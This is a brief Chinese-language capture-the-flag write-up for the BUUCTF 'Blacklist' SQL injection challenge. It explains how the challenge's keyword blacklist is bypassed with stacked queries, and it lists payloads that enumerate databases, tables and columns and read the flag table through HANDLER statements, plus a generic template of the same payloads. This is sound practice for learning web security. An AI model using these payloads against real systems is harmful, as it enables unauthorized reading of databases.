【BUUCTF】Blacklist (SQL注入)
题目来源
收录于:BUUCTF GYCTF2020
题目描述
纯粹的SQL注入题
当触发黑名单时返回如下
过滤了以下关键字
set prepare alter rename select update delete drop insert where .
题解
发现可以进行堆叠注入
?inject=1';show databases;
爆表名
?inject=1';show tables;
爆字段名(可以不用爆字段名,这道题用不到),这里两个payload都可以:
?inject=1';show columns from FlagHere;
?inject=1';desc FlagHere;
爆表的内容
?inject=1';HANDLER FlagHere open;HANDLER FlagHere read first;HANDLER FlagHere close;
得到flag
总结
堆叠注入姿势如下:
//爆库
?id=1';show databases;%23
//爆表名
?id=1';show tables;%23
//爆字段名,以下两个都可以
?id=1';show columns from 表名;%23
?id=1';desc 表名;%23
//读表内容
?id=1';HANDLER 表名 open;HANDLER 表名 read first;HANDLER 表名 close;%23
注意:当表名以数字开头时,需要用反引号对其包裹。
标签:BUUCTF,FlagHere,show,23,Blacklist,HANDLER,表名,id From: https://www.cnblogs.com/MrSoap/p/18345746